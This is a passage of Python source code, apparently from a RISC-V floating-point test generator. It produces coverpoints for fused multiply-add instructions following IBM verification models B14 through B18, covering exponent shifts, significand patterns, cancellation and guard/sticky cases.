if mul_exp-((2*mant_bits)+1) < -1*exp_max: exp1 = -1*exp_max
else: exp1 = mul_exp-((2*mant_bits)+1)
if mul_exp+mant_bits+1 > exp_max: exp2 = exp_max
else: exp2 = mul_exp+mant_bits+1
for j in range(exp1, exp2):
rs3_num = float.hex(float(str(rs3).split('e')[0])).split('p')[0]+'p'+str(int(float.hex(float(str(rs3).split('e')[0])).split('p')[1])+j)
rs3_num = float.fromhex(rs3_num)
b14_comb.append((floatingPoint_tohex(flen,float(rs1)),floatingPoint_tohex(flen,float(rs2)),floatingPoint_tohex(flen,float(rs3_num))))
comment.append(' | Multiplicand Exponent = '+str(mul_exp)+', Addend exponent = '+ str(int(float.hex(float(str(rs3).split('e')[0])).split('p')[1])+j) + ' --> Values in the range [-(2*p + 1) , (p + 1)]')
rs3_exp = random.randrange(exp2, exp_max)
rs3_num = float.hex(float(str(rs3).split('e')[0])).split('p')[0]+'p'+str(int(float.hex(float(str(rs3).split('e')[0])).split('p')[1])+rs3_exp)
rs3_num = float.fromhex(rs3_num)
b14_comb.append((floatingPoint_tohex(flen,float(rs1)),floatingPoint_tohex(flen,float(rs2)),floatingPoint_tohex(flen,float(rs3_num))))
comment.append(' | Multiplicand Exponent = '+str(mul_exp)+', Addend exponent = '+ str(int(float.hex(float(str(rs3).split('e')[0])).split('p')[1])+rs3_exp) + ' --> A value larger than (p + 1)')
coverpoints = []
k = 0
for c in b14_comb:
cvpt = ""
for x in range(1, 4):
# cvpt += 'rs'+str(x)+'_val=='+str(c[x-1]) # uncomment this if you want rs1_val instead of individual fields
cvpt += (extract_fields(flen,c[x-1],str(x)))
cvpt += " and "
cvpt += 'rm_val == 0'
cvpt += ' # '
for y in range(1, 4):
cvpt += 'rs'+str(y)+'_val=='
cvpt += num_explain(flen, c[y-1]) + '(' + str(c[y-1]) + ')'
if(y != ops):
cvpt += " and "
cvpt += comment[k]
coverpoints.append(cvpt)
k += 1
mess='Generated'+ (' '*(5-len(str(len(coverpoints)))))+ str(len(coverpoints)) +' '+ \
(str(32) if flen == 32 else str(64)) + '-bit coverpoints using Model B14 for '+opcode+' !'
logger.info(mess)
coverpoints = comments_parser(coverpoints)
return coverpoints
def ibm_b15(flen, opcode, ops, N=-1, seed=-1):
'''
IBM Model B15 Definition:
In this model we test the combination of different shift values between the
addends, with special patterns in the significands of the addends.
For the significand of the addend and for the multiplication result we take the
cases defined in model (B9) "Special Significands on Inputs"
For the shift we take the cases defined in model (B14) "Shift – multiply-add".
:param flen: Size of the floating point registers
:param opcode: Opcode for which the coverpoints are to be generated
:param ops: No. of Operands taken by the opcode
:param seed: Initial seed value of the random library. (Predefined to -1. Actual value is set with respect to the opcode calling the function)
:type flen: int
:type opcode: str
:type ops: int
:param seed: int
Abstract Dataset Description:
Operand 1, 2 = Random
Operand 3 ∈ Abstract Dataset in B9 + Abstract Dataset in B14
Implementation:
- Here the condition is imposed that if the value of the ops variable is 3, then each of the elements in the flip types is iterated and split into their respective sign, mantissa and exponent part.
- A mul variable is initialized and parsed to the field_dec_converter for each rs1 value in the list. Next the loop is run for the mantissa parts generated for rs1 values, where it is checked for certain patterns like the leading 0’s, leading 1’s, trailing 0’s and trailing 1’s.
- The checkerboard list is declared with the probable sequences for rs2. Here the sign and exponent are extracted from the rs1 values. Mantissa part is derived from the checkerboard list. Consecutively, if the flen value differs, then the range available varies.
- The operand values are then passed into the extract_fields function to get individual fields in a floating point number (sign, exponent and mantissa).
- Coverpoints are then appended with rounding mode “0” for that particular opcode.
'''
opcode = opcode.split('.')[0]
if flen == 32:
flip_types = fzero + fone + fminsubnorm + fmaxsubnorm + fminnorm + fmaxnorm
e_sz=8
exp_max = 255
ieee754_maxnorm = '0x1.7fffffp+127'
maxnum = float.fromhex(ieee754_maxnorm)
exp_max = 127
mant_bits = 23
limnum = maxnum
elif flen == 64:
flip_types = dzero + done + dminsubnorm + dmaxsubnorm + dminnorm + dmaxnorm
e_sz=11
exp_max = 1023
maxdec = '1.7976931348623157e+308'
maxnum = float.fromhex('0x1.fffffffffffffp+1023')
exp_max = 1022
ieee754_limnum = '0x1.fffffffffffffp+507'
mant_bits = 52
limnum = float.fromhex(ieee754_limnum)
if seed == -1:
if opcode in 'fmadd':
random.seed(0)
elif opcode in 'fnmadd':
random.seed(1)
elif opcode in 'fmsub':
random.seed(2)
elif opcode in 'fnmsub':
random.seed(3)
else:
random.seed(seed)
rs1 = []
b15_comb = []
comment = []
if ops == 3:
for i in range(len(flip_types)):
rs1.append(flip_types[i])
for i in range(len(rs1)):
bin_val = bin(int('1'+rs1[i][2:],16))[3:]
rs1_sgn = bin_val[0]
rs1_exp = bin_val[1:e_sz+1]
rs1_man = bin_val[e_sz+1:]
if flen == 32:
if int(rs1_exp,2) < 65: rs2_exp = 0
else : rs2_exp = random.randrange(0,int(rs1_exp,2)-65)
comment_str = ' | Exponent = '+ str(rs2_exp-127) + ' --> Difference smaller than -(2p + 1)'
rs2_exp = '{:08b}'.format(rs2_exp)
elif flen == 64:
if int(rs1_exp,2) < 129: rs2_exp = 0
else : rs2_exp = random.randrange(0,int(rs1_exp,2)-129)
comment_str = ' | Exponent = '+ str(rs2_exp-1023) + ' --> Difference smaller than -(2p + 1)'
rs2_exp = '{:011b}'.format(rs2_exp)
mul = fields_dec_converter(flen,rs1[i])
rs1_act = random.uniform(1,limnum)
rs2_act = mul/rs1_act
for j in range(len(rs1_man)):
rs2_sgn = rs1_sgn
rs2_man = '0'*j + rs1_man[j:] # Leading 0s
rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
b15_comb.append((floatingPoint_tohex(flen,float(rs1_act)),floatingPoint_tohex(flen,float(rs2_act)),floatingPoint_tohex(flen,float(rs2))))
comment.append(comment_str + ' | Leading zeroes ---> rs3_man = '+rs2_man)
rs2_man = '1'*j + '0'*(len(rs1_man)-j) # Leading 1s
rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
b15_comb.append((floatingPoint_tohex(flen,float(rs1_act)),floatingPoint_tohex(flen,float(rs2_act)),floatingPoint_tohex(flen,float(rs2))))
comment.append(comment_str + ' | Leading ones ---> rs3_man = '+rs2_man)
rs2_man = rs1_man[0:j] + '0'*(len(rs1_man)-j) # Trailing 0s
rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
b15_comb.append((floatingPoint_tohex(flen,float(rs1_act)),floatingPoint_tohex(flen,float(rs2_act)),floatingPoint_tohex(flen,float(rs2))))
comment.append(comment_str + ' | Trailing zeroes ---> rs3_man = '+rs2_man)
rs2_man = '0'*j + '1'*(len(rs1_man)-j) # Trailing 1s
rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
b15_comb.append((floatingPoint_tohex(flen,float(rs1_act)),floatingPoint_tohex(flen,float(rs2_act)),floatingPoint_tohex(flen,float(rs2))))
comment.append(comment_str + ' | Trailing ones ---> rs3_man = '+rs2_man)
for j in range(len(rs1_man)-math.ceil(0.1*len(rs1_man)),len(rs1_man)):
rs2_sgn = rs1_sgn
rs2_exp = rs1_exp
rs2_man = '1'*j + '0'*(len(rs1_man)-j) # Long sequence of 1s
rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
b15_comb.append((floatingPoint_tohex(flen,float(rs1_act)),floatingPoint_tohex(flen,float(rs2_act)),floatingPoint_tohex(flen,float(rs2))))
comment.append(comment_str + ' | Long sequence of ones ---> rs3_man = '+rs2_man)
rs2_man = '0'*j + '1'*(len(rs1_man)-j) # Long sequence of 0s
rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
b15_comb.append((floatingPoint_tohex(flen,float(rs1_act)),floatingPoint_tohex(flen,float(rs2_act)),floatingPoint_tohex(flen,float(rs2))))
comment.append(comment_str + ' | Long sequence of zeroes ---> rs3_man = '+rs2_man)
chkrbrd = ['011','110','0011','1100','0111','1000','010','101','0110','1001']
for j in chkrbrd:
rs2_sgn = rs1_sgn
rs2_exp = rs1_exp
rs2_man = j
for k in range(math.ceil(len(rs1_man)/len(j))):
rs2_man += j
rs2_man = rs2_man[0:flen-e_sz-1]
rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
b15_comb.append((floatingPoint_tohex(flen,float(rs1_act)),floatingPoint_tohex(flen,float(rs2_act)),floatingPoint_tohex(flen,float(rs2))))
comment.append(comment_str + ' | Checkerboard pattern ---> rs3_man = '+rs2_man)
if flen == 32:
if int(rs1_exp,2) > 222: rs2_exp = 255
else : rs2_exp = random.randrange(int(rs1_exp,2)+33, 255)
comment_str = ' | Exponent = '+ str(rs2_exp-127) + ' --> Difference greater than (p + 1)'
rs2_exp = '{:08b}'.format(rs2_exp)
elif flen == 64:
if int(rs1_exp,2) > 958: rs2_exp = 1023
else : rs2_exp = random.randrange(int(rs1_exp,2)+65, 1023)
comment_str = ' | Exponent = '+ str(rs2_exp-1023) + ' --> Difference greater than (p + 1)'
rs2_exp = '{:011b}'.format(rs2_exp)
mul = fields_dec_converter(flen,rs1[i])
rs1_act = random.uniform(1,limnum)
rs2_act = mul/rs1_act
for j in range(len(rs1_man)):
rs2_sgn = rs1_sgn
rs2_man = '0'*j + rs1_man[j:] # Leading 0s
rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
b15_comb.append((floatingPoint_tohex(flen,float(rs1_act)),floatingPoint_tohex(flen,float(rs2_act)),floatingPoint_tohex(flen,float(rs2))))
comment.append(comment_str + ' | Leading zeroes ---> rs3_man = '+rs2_man)
rs2_man = '1'*j + '0'*(len(rs1_man)-j) # Leading 1s
rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
b15_comb.append((floatingPoint_tohex(flen,float(rs1_act)),floatingPoint_tohex(flen,float(rs2_act)),floatingPoint_tohex(flen,float(rs2))))
comment.append(comment_str + ' | Leading ones ---> rs3_man = '+rs2_man)
rs2_man = rs1_man[0:j] + '0'*(len(rs1_man)-j) # Trailing 0s
rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
b15_comb.append((floatingPoint_tohex(flen,float(rs1_act)),floatingPoint_tohex(flen,float(rs2_act)),floatingPoint_tohex(flen,float(rs2))))
comment.append(comment_str + ' | Trailing zeroes ---> rs3_man = '+rs2_man)
rs2_man = '0'*j + '1'*(len(rs1_man)-j) # Trailing 1s
rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
b15_comb.append((floatingPoint_tohex(flen,float(rs1_act)),floatingPoint_tohex(flen,float(rs2_act)),floatingPoint_tohex(flen,float(rs2))))
comment.append(comment_str + ' | Trailing ones ---> rs3_man = '+rs2_man)
for j in range(len(rs1_man)-math.ceil(0.1*len(rs1_man)),len(rs1_man)):
rs2_sgn = rs1_sgn
rs2_exp = rs1_exp
rs2_man = '1'*j + '0'*(len(rs1_man)-j) # Long sequence of 1s
rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
b15_comb.append((floatingPoint_tohex(flen,float(rs1_act)),floatingPoint_tohex(flen,float(rs2_act)),floatingPoint_tohex(flen,float(rs2))))
comment.append(comment_str + ' | Long sequence of ones ---> rs3_man = '+rs2_man)
rs2_man = '0'*j + '1'*(len(rs1_man)-j) # Long sequence of 0s
rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
b15_comb.append((floatingPoint_tohex(flen,float(rs1_act)),floatingPoint_tohex(flen,float(rs2_act)),floatingPoint_tohex(flen,float(rs2))))
comment.append(comment_str + ' | Long sequence of zeroes ---> rs3_man = '+rs2_man)
chkrbrd = ['011','110','0011','1100','0111','1000','010','101','0110','1001']
for j in chkrbrd:
rs2_sgn = rs1_sgn
rs2_exp = rs1_exp
rs2_man = j
for k in range(math.ceil(len(rs1_man)/len(j))):
rs2_man += j
rs2_man = rs2_man[0:flen-e_sz-1]
rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
b15_comb.append((floatingPoint_tohex(flen,float(rs1_act)),floatingPoint_tohex(flen,float(rs2_act)),floatingPoint_tohex(flen,float(rs2))))
comment.append(comment_str + ' | Checkerboard pattern ---> rs3_man = '+rs2_man)
if flen == 32:
ul = int(rs1_exp,2)+33
ll = int(rs1_exp,2)-65
if int(rs1_exp,2) >= 222: ul = 255
if int(rs1_exp,2) < 65: ll = 0
elif flen == 64:
ul = int(rs1_exp,2)+65
ll = int(rs1_exp,2)-129
if int(rs1_exp,2) >= 958: ul = 1023
if int(rs1_exp,2) < 129: ll = 0
for expval in range (ll, ul):
rs2_exp = expval
if flen == 32:
comment_str = ' | Exponent = '+ str(rs2_exp-127) + ' --> Difference between -(2p+1) and (p+1)'
rs2_exp = '{:08b}'.format(rs2_exp)
elif flen == 64:
comment_str = ' | Exponent = '+ str(rs2_exp-1023) + ' --> Difference between -(2p+1) and (p+1)'
rs2_exp = '{:011b}'.format(rs2_exp)
mul = fields_dec_converter(flen,rs1[i])
rs1_act = random.uniform(1,limnum)
rs2_act = mul/rs1_act
for j in range(len(rs1_man)):
rs2_sgn = rs1_sgn
rs2_man = '0'*j + rs1_man[j:] # Leading 0s
rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
b15_comb.append((floatingPoint_tohex(flen,float(rs1_act)),floatingPoint_tohex(flen,float(rs2_act)),floatingPoint_tohex(flen,float(rs2))))
comment.append(comment_str + ' | Leading zeroes ---> rs3_man = '+rs2_man)
rs2_man = '1'*j + '0'*(len(rs1_man)-j) # Leading 1s
rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
b15_comb.append((floatingPoint_tohex(flen,float(rs1_act)),floatingPoint_tohex(flen,float(rs2_act)),floatingPoint_tohex(flen,float(rs2))))
comment.append(comment_str + ' | Leading ones ---> rs3_man = '+rs2_man)
rs2_man = rs1_man[0:j] + '0'*(len(rs1_man)-j) # Trailing 0s
rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
b15_comb.append((floatingPoint_tohex(flen,float(rs1_act)),floatingPoint_tohex(flen,float(rs2_act)),floatingPoint_tohex(flen,float(rs2))))
comment.append(comment_str + ' | Trailing zeroes ---> rs3_man = '+rs2_man)
rs2_man = '0'*j + '1'*(len(rs1_man)-j) # Trailing 1s
rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
b15_comb.append((floatingPoint_tohex(flen,float(rs1_act)),floatingPoint_tohex(flen,float(rs2_act)),floatingPoint_tohex(flen,float(rs2))))
comment.append(comment_str + ' | Trailing ones ---> rs3_man = '+rs2_man)
for j in range(len(rs1_man)-math.ceil(0.1*len(rs1_man)),len(rs1_man)):
rs2_sgn = rs1_sgn
rs2_exp = rs1_exp
rs2_man = '1'*j + '0'*(len(rs1_man)-j) # Long sequence of 1s
rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
b15_comb.append((floatingPoint_tohex(flen,float(rs1_act)),floatingPoint_tohex(flen,float(rs2_act)),floatingPoint_tohex(flen,float(rs2))))
comment.append(comment_str + ' | Long sequence of ones ---> rs3_man = '+rs2_man)
rs2_man = '0'*j + '1'*(len(rs1_man)-j) # Long sequence of 0s
rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
b15_comb.append((floatingPoint_tohex(flen,float(rs1_act)),floatingPoint_tohex(flen,float(rs2_act)),floatingPoint_tohex(flen,float(rs2))))
comment.append(comment_str + ' | Long sequence of zeroes ---> rs3_man = '+rs2_man)
chkrbrd = ['011','110','0011','1100','0111','1000','010','101','0110','1001']
for j in chkrbrd:
rs2_sgn = rs1_sgn
rs2_exp = rs1_exp
rs2_man = j
for k in range(math.ceil(len(rs1_man)/len(j))):
rs2_man += j
rs2_man = rs2_man[0:flen-e_sz-1]
rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
b15_comb.append((floatingPoint_tohex(flen,float(rs1_act)),floatingPoint_tohex(flen,float(rs2_act)),floatingPoint_tohex(flen,float(rs2))))
comment.append(comment_str + ' | Checkerboard pattern ---> rs3_man = '+rs2_man)
coverpoints = []
k = 0
for c in b15_comb:
cvpt = ""
for x in range(1, 4):
# cvpt += 'rs'+str(x)+'_val=='+str(c[x-1]) # uncomment this if you want rs1_val instead of individual fields
cvpt += (extract_fields(flen,c[x-1],str(x)))
cvpt += " and "
cvpt += 'rm_val == 0'
cvpt += ' # '
for y in range(1, ops+1):
cvpt += 'rs'+str(y)+'_val=='
cvpt += num_explain(flen, c[y-1]) + '(' + str(c[y-1]) + ')'
if(y != ops):
cvpt += " and "
cvpt += comment[k]
coverpoints.append(cvpt)
k += 1
mess='Generated'+ (' '*(5-len(str(len(coverpoints)))))+ str(len(coverpoints)) +' '+ \
(str(32) if flen == 32 else str(64)) + '-bit coverpoints using Model B15 for '+opcode+' !'
logger.info(mess)
coverpoints = comments_parser(coverpoints)
return coverpoints
def ibm_b16(flen, opcode, ops, seed=-1):
'''
IBM Model B16 Definition:
This model tests every possible value for cancellation.
For the difference between the exponent of the intermediate result and the
maximum between the exponents of the addend and the multiplication result,
test all values in the range:
[-(2 * p + 1), 1].
:param flen: Size of the floating point registers
:param opcode: Opcode for which the coverpoints are to be generated
:param ops: No. of Operands taken by the opcode
:param seed: Initial seed value of the random library. (Predefined to -1. Actual value is set with respect to the opcode calling the function)
:type flen: int
:type opcode: str
:type ops: int
:param seed: int
Abstract Dataset Description:
Intermediate Result.exp - max(addend.exp, multiplication result.exp) ∈ [-(2 * p + 1), 1] → Condition 1
Operand 1 {operation 1} Operand 2 {operation 2} Operand 3 = Condition 1
Implementation:
- Random values of operands 1 and 2 are obtained from the random library.
- Since the objective of the test is to cancel the operands among each other constrained by the above condition, the intermediate result is calculated by the multiplication of operand 1 and 2.
- The operand values are then passed into the extract_fields function to get individual fields in a floating point number (sign, exponent and mantissa).
- Coverpoints are then appended with rounding mode “0” for that particular opcode.
'''
opcode = opcode.split('.')[0]
getcontext().prec = 40
if flen == 32:
ieee754_maxnorm = '0x1.7fffffp+127'
maxnum = float.fromhex(ieee754_maxnorm)
ieee754_minsubnorm = '0x0.000001p-126'
minsubnorm = float.fromhex(ieee754_minsubnorm)
ieee754_maxsubnorm = '0x0.7fffffp-126'
maxsubnorm = float.fromhex(ieee754_maxsubnorm)
limnum = maxnum
elif flen == 64:
ieee754_maxnorm = '0x1.fffffffffffffp+1023'
maxnum = float.fromhex(ieee754_maxnorm)
ieee754_minsubnorm = '0x0.0000000000001p-1022'
minsubnorm = float.fromhex(ieee754_minsubnorm)
ieee754_maxsubnorm = '0x0.fffffffffffffp-1022'
maxsubnorm = float.fromhex(ieee754_maxsubnorm)
ieee754_limnum = '0x1.fffffffffffffp+507'
limnum = float.fromhex(ieee754_limnum)
if seed == -1:
if opcode in 'fmadd':
random.seed(0)
elif opcode in 'fmsub':
random.seed(1)
elif opcode in 'fnmadd':
random.seed(2)
elif opcode in 'fnmsub':
random.seed(3)
else:
random.seed(seed)
b17_comb = []
for i in range(200):
rs1 = random.uniform(minsubnorm,limnum)
rs2 = random.uniform(minsubnorm,limnum)
ir = random.uniform(minsubnorm,rs1*rs2)
if opcode in 'fmadd':
if flen == 32:
rs3 = ir - rs1*rs2
elif flen == 64:
rs3 = Decimal(ir) - Decimal(rs1)*Decimal(rs2)
elif opcode in 'fnmadd':
if flen == 32:
rs3 = -1*rs1*rs2 - ir
elif flen == 64:
rs3 = -1*Decimal(rs1)*Decimal(rs2) - Decimal(ir)
elif opcode in 'fmsub':
if flen == 32:
rs3 = rs1*rs2 - ir
elif flen == 64:
rs3 = Decimal(rs1)*Decimal(rs2) - Decimal(ir)
elif opcode in 'fnmsub':
if flen == 32:
rs3 = ir + rs1*rs2
elif flen == 64:
rs3 = Decimal(ir) + Decimal(rs1)*Decimal(rs2)
if(flen==32):
x1 = struct.unpack('f', struct.pack('f', rs1))[0]
x2 = struct.unpack('f', struct.pack('f', rs2))[0]
elif(flen==64):
x1 = rs1
x2 = rs2
result = []
if opcode in ['fmadd','fmsub','fnmadd','fnmsub']:
b17_comb.append((floatingPoint_tohex(flen,float(rs1)),floatingPoint_tohex(flen,float(rs2)),floatingPoint_tohex(flen,float(rs3))))
coverpoints = []
comment = ' | Multiply-Add: Cancellation'
for c in b17_comb:
cvpt = ""
for x in range(1, 4):
# cvpt += 'rs'+str(x)+'_val=='+str(c[x-1]) # uncomment this if you want rs1_val instead of individual fields
cvpt += (extract_fields(flen,c[x-1],str(x)))
cvpt += " and "
cvpt += 'rm_val == 0'
cvpt += ' # '
for y in range(1, ops+1):
cvpt += 'rs'+str(y)+'_val=='
cvpt += num_explain(flen, c[y-1]) + '(' + str(c[y-1]) + ')'
if(y != ops):
cvpt += " and "
cvpt += comment
coverpoints.append(cvpt)
mess='Generated'+ (' '*(5-len(str(len(coverpoints)))))+ str(len(coverpoints)) +' '+ \
(str(32) if flen == 32 else str(64)) + '-bit coverpoints using Model B16 for '+opcode+' !'
logger.info(mess)
coverpoints = comments_parser(coverpoints)
return coverpoints
def ibm_b17(flen, opcode, ops, seed=-1):
'''
IBM Model B17 Definition:
This model tests all combinations of cancellation values as in model (B16), with
all possible unbiased exponent values of subnormal results.
:param flen: Size of the floating point registers
:param opcode: Opcode for which the coverpoints are to be generated
:param ops: No. of Operands taken by the opcode
:param seed: Initial seed value of the random library. (Predefined to -1. Actual value is set with respect to the opcode calling the function)
:type flen: int
:type opcode: str
:type ops: int
:param seed: int
Abstract Dataset Description:
Intermediate Result.exp - max(addend.exp, multiplication result.exp) ∈ [-(2 * p + 1), 1] → Condition 1 (Exponents are subnormal)
Operand 1 {operation 1} Operand 2 {operation 2} Operand 3 = Condition 1
Implementation:
- It functions the same as model B16 with calculating the additional unbiased exponent values of subnormal results.
- Operands 1 and 2 are randomly initialized in the range and the subsequent operator value is found.
- The operand values are then passed into the extract_fields function to get individual fields in a floating point number (sign, exponent and mantissa).
- Coverpoints are then appended with rounding mode “0” for that particular opcode.
'''
opcode = opcode.split('.')[0]
getcontext().prec = 40
if flen == 32:
ieee754_maxnorm = '0x1.7fffffp+127'
maxnum = float.fromhex(ieee754_maxnorm)
ieee754_minsubnorm = '0x0.000001p-126'
minsubnorm = float.fromhex(ieee754_minsubnorm)
ieee754_maxsubnorm = '0x0.7fffffp-126'
maxsubnorm = float.fromhex(ieee754_maxsubnorm)
limnum = maxnum
elif flen == 64:
ieee754_maxnorm = '0x1.fffffffffffffp+1023'
maxnum = float.fromhex(ieee754_maxnorm)
ieee754_minsubnorm = '0x0.0000000000001p-1022'
minsubnorm = float.fromhex(ieee754_minsubnorm)
ieee754_maxsubnorm = '0x0.fffffffffffffp-1022'
maxsubnorm = float.fromhex(ieee754_maxsubnorm)
ieee754_limnum = '0x1.fffffffffffffp+507'
limnum = float.fromhex(ieee754_limnum)
if seed == -1:
if opcode in 'fmadd':
random.seed(0)
elif opcode in 'fmsub':
random.seed(1)
elif opcode in 'fnmadd':
random.seed(2)
elif opcode in 'fnmsub':
random.seed(3)
else:
random.seed(seed)
b17_comb = []
for i in range(200):
rs1 = random.uniform(minsubnorm,limnum)
rs2 = random.uniform(minsubnorm,limnum)
ir = random.uniform(minsubnorm,maxsubnorm)
if ir > rs1*rs2: ir = random.uniform(minsubnorm,rs1*rs2)
if opcode in 'fmadd':
if flen == 32:
rs3 = ir - rs1*rs2
elif flen == 64:
rs3 = Decimal(ir) - Decimal(rs1)*Decimal(rs2)
elif opcode in 'fnmadd':
if flen == 32:
rs3 = -1*rs1*rs2 - ir
elif flen == 64:
rs3 = -1*Decimal(rs1)*Decimal(rs2) - Decimal(ir)
elif opcode in 'fmsub':
if flen == 32:
rs3 = rs1*rs2 - ir
elif flen == 64:
rs3 = Decimal(rs1)*Decimal(rs2) - Decimal(ir)
elif opcode in 'fnmsub':
if flen == 32:
rs3 = ir + rs1*rs2
elif flen == 64:
rs3 = Decimal(ir) + Decimal(rs1)*Decimal(rs2)
if(flen==32):
x1 = struct.unpack('f', struct.pack('f', rs1))[0]
x2 = struct.unpack('f', struct.pack('f', rs2))[0]
elif(flen==64):
x1 = rs1
x2 = rs2
result = []
if opcode in ['fmadd','fmsub','fnmadd','fnmsub']:
b17_comb.append((floatingPoint_tohex(flen,float(rs1)),floatingPoint_tohex(flen,float(rs2)),floatingPoint_tohex(flen,float(rs3))))
coverpoints = []
comment = ' | Multiply-Add: Cancellation ---> Subnormal result '
for c in b17_comb:
cvpt = ""
for x in range(1, 4):
# cvpt += 'rs'+str(x)+'_val=='+str(c[x-1]) # uncomment this if you want rs1_val instead of individual fields
cvpt += (extract_fields(flen,c[x-1],str(x)))
cvpt += " and "
cvpt += 'rm_val == 0'
cvpt += ' # '
for y in range(1, ops+1):
cvpt += 'rs'+str(y)+'_val=='
cvpt += num_explain(flen, c[y-1]) + '(' + str(c[y-1]) + ')'
if(y != ops):
cvpt += " and "
cvpt += comment
coverpoints.append(cvpt)
mess='Generated'+ (' '*(5-len(str(len(coverpoints)))))+ str(len(coverpoints)) +' '+ \
(str(32) if flen == 32 else str(64)) + '-bit coverpoints using Model B17 for '+opcode+' !'
logger.info(mess)
coverpoints = comments_parser(coverpoints)
return coverpoints
def ibm_b18(flen, opcode, ops, seed=-1):
'''
IBM Model B18 Definition:
This model checks different cases where the multiplication causes some event
in the product while the addition cancels this event.
1. Product: Enumerate all options for LSB, Guard and Sticky bit. Intermediate Result: Exact (Guard and Sticky are zero).
2. Product: Take overflow values from (B4) "Overflow". Intermediate Result: No overflow
3. Product: Take underflow values from model (B5) "Underflow". Intermediate Result: No underflow
:param flen: Size of the floating point registers
:param opcode: Opcode for which the coverpoints are to be generated
:param ops: No. of Operands taken by the opcode
:param seed: Initial seed value of the random library. (Predefined to -1. Actual value is set with respect to the opcode calling the function)
:type flen: int
:type opcode: str
:type ops: int
:param seed: int
Implementation:
- Firstly, cancellation using the B3 model as base is performed.
- Next model is the replica of the B4 model which takes into account the overflow of value for guard, round and sticky bits
- The final model is obtained from the B5 model and different operations are done for underflow in decimal format.
- The operand values are calculated using the intermediate results dataset and then passed into the extract_fields function to get individual fields in a floating point number (sign, exponent and mantissa).
- Coverpoints are then appended with rounding mode “0” for that particular opcode.
'''
opcode = opcode.split('.')[0]
getcontext().prec = 40
if seed == -1:
if opcode in 'fmadd':
random.seed(0)
elif opcode in 'fnmadd':
random.seed(1)
elif opcode in 'fmsub':
random.seed(2)
elif opcode in 'fnmsub':
random.seed(3)
else:
random.seed(seed)
# Cancellation of B3
if flen == 32:
ieee754_maxnorm = '0x1.7fffffp+127'
maxnum = float.fromhex(ieee754_maxnorm)
ieee754_num = []
lsb = []
for i in fsubnorm+fnorm:
if int(i[-1],16)%2 == 1:
lsb.append('1')
lsb.append('1')
else:
lsb.append('0')
lsb.append('0')
float_val = float.hex(fields_dec_converter(32,i))
if float_val[0] != '-':
ieee754_num.append(float_val.split('p')[0][0:10]+'p'+float_val.split('p')[1])
ieee754_num.append('-'+float_val.split('p')[0][0:10]+'p'+float_val.split('p')[1])
else:
ieee754_num.append(float_val.split('p')[0][0:11]+'p'+float_val.split('p')[1])
ieee754_num.append(float_val.split('p')[0][1:11]+'p'+float_val.split('p')[1])
ir_dataset = []
for k in range(len(ieee754_num)):
for i in range(2,16,2):
grs = '{:04b}'.format(i)
if ieee754_num[k][0] == '-': sign = '1'
else: sign = '0'
ir_dataset.append([ieee754_num[k].split('p')[0]+str(i)+'p'+ieee754_num[k].split('p')[1],' | Guard = '+grs[0]+' Sticky = '+grs[2]+' Sign = '+sign+' LSB = '+lsb[k] + ': Multiply add - Guard & Sticky Cancellation'])
for i in range(len(ir_dataset)):
ir_dataset[i][0] = float.fromhex(ir_dataset[i][0])
elif flen == 64:
maxdec = '1.7976931348623157e+308'
maxnum = float.fromhex('0x1.fffffffffffffp+1023')
ieee754_num = []
lsb = []
for i in dsubnorm+dnorm:
if int(i[-1],16)%2 == 1:
lsb.append('1')
lsb.append('1')
else:
lsb.append('0')
lsb.append('0')
float_val = str(fields_dec_converter(64,i))
if float_val[0] != '-':
ieee754_num.append(float_val)
ieee754_num.append('-'+float_val)
else:
ieee754_num.append(float_val)
ieee754_num.append(float_val[1:])
ir_dataset = []
for k in range(len(ieee754_num)):
for i in range(2,16,2):
grs = '{:04b}'.format(i)
if ieee754_num[k][0] == '-': sign = '1'
else: sign = '0'
ir_dataset.append([str(Decimal(ieee754_num[k].split('e')[0])+Decimal(pow(i*16,-14)))+'e'+ieee754_num[k].split('e')[1],' | Guard = '+grs[0]+' Sticky = '+grs[2]+' Sign = '+sign+' LSB = '+lsb[k] + ': Multiply add - Guard & Sticky Cancellation'])
b18_comb = []
for i in range(len(ir_dataset)):
rs1 = random.uniform(1,maxnum)
res = '0x1.7ffff0p+100'
res = float.fromhex(res)
if opcode in 'fmadd':
if flen == 32:
rs2 = ir_dataset[i][0]/rs1
rs3 = res - ir_dataset[i][0]
elif flen == 64:
